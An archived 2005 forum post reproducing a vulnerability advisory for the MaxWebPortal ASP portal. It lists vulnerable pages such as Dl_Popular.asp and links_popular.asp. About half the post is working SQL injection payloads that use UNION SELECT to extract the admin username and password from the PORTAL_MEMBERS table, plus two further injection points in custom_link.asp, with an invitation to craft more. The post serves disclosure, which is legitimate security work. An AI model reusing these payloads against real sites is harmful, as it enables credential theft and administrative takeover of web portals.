Critical Sql Injections In Maxwebportal

Full Version: Critical Sql Injections In Maxwebportal

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

May 4 2005, 01:45 AM

QUOTE

Critical sql injections in Maxwebportal

Vendor URL: Http://www.maxwebportal.info , http://www.maxwebportal.com
Soloution: Some patch are available in www.maxwebportal.info
Cause: Sql injection
Version: all versions before 2005/4/27 (maxwebportal 2.x, 1.35 , ... )
Fix Available: Some of them are available
Finder: Soroush Dalili

Description: Remote user can find other's user's password from some sql
injection so can gain admin. of portal!
What's that? -> Maxwebportal is good and free asp portal that used in many
sites (also in my old site!)
Bugz:
Remote user can gain other password by some sql injections in:
article_popular.asp
dl_popular.asp
links_popular.asp
pic_popular.asp
article_rate.asp
dl_rate.asp
links_rate.asp
pic_rates.asp
article_toprated.asp
dl_toprated.asp
links_toprated.asp
pic_toprated.asp
------------------------------------------------------------------------------------------------------------
Proof:
Some Exploits:
Get Username=Admin password: (if I didn't write some of them, you can make
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
---------------
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
------------
you can make it in other pages too!
-----------------------------------------------------------------------------------------------
some another Sql injections are:
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&Forum_ID=[Sql inject]

-----------------------------------------------------------------------------------------------

Link is unavailable

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.